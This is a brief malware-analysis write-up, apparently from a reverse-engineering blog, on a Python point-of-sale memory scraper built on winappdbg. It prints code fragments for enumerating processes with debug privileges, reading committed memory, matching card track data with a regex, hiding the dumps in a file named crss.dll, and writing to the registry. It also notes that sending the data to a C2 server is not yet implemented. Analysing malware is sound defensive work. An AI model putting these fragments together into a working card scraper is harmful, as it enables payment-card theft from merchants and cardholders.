Title: Memory Scanning a Windows Process in Python Using winappdbg
Purpose: Analyze Python memory scanning point-of-sale (PoS) malware for credit card data
Analysis Steps:
(1) Display the Windows version and the current architecture
from winappdbg import *
System.os, System.arch, System.bits
(2) Create a snapshot of running processes
System.request_debug_privileges(), System.scan_processes()
(3) Obtain local username (from getpass.getuser())
(4) Create a writeable file in %APPDATA%
System.request_debug_privileges(), System.scan_processes()
dump_writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\crss.dll', 'w+')
(5) Obtain all processes that match the requested filenames:
(6) Get a memory map of the process
memoryMap = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)
(7) For each memory block in the map read address and size of memory blocks, its state (free or allocated), page protection bits (looking for win32.MEM_COMMIT), and its memory type:
(8) Read the data from memory
if mbi.has_content() and mbi.State == win32.MEM_COMMIT
(9) Implement a simple Regular Expression looking for Track2 data
dump_regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', data)
dump_data.append(dump_regex)
(10) Beautify the extracted data
(11) Write dump data into crss.dll
(12) Write the data to registry
import _winreghKey = CreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Internet Explorer\\")subKey = SetValueEx( hKey, "Test", 0, REG_BINARY, "666" )
Missing features are as follows:
(1) Encode Saved Data
(2) Add Luhn Algorithm
(3) Create a multithreaded process for this algorithm
(4) Send data to email/C2
Reverse Engineering, Malware Deep Insight 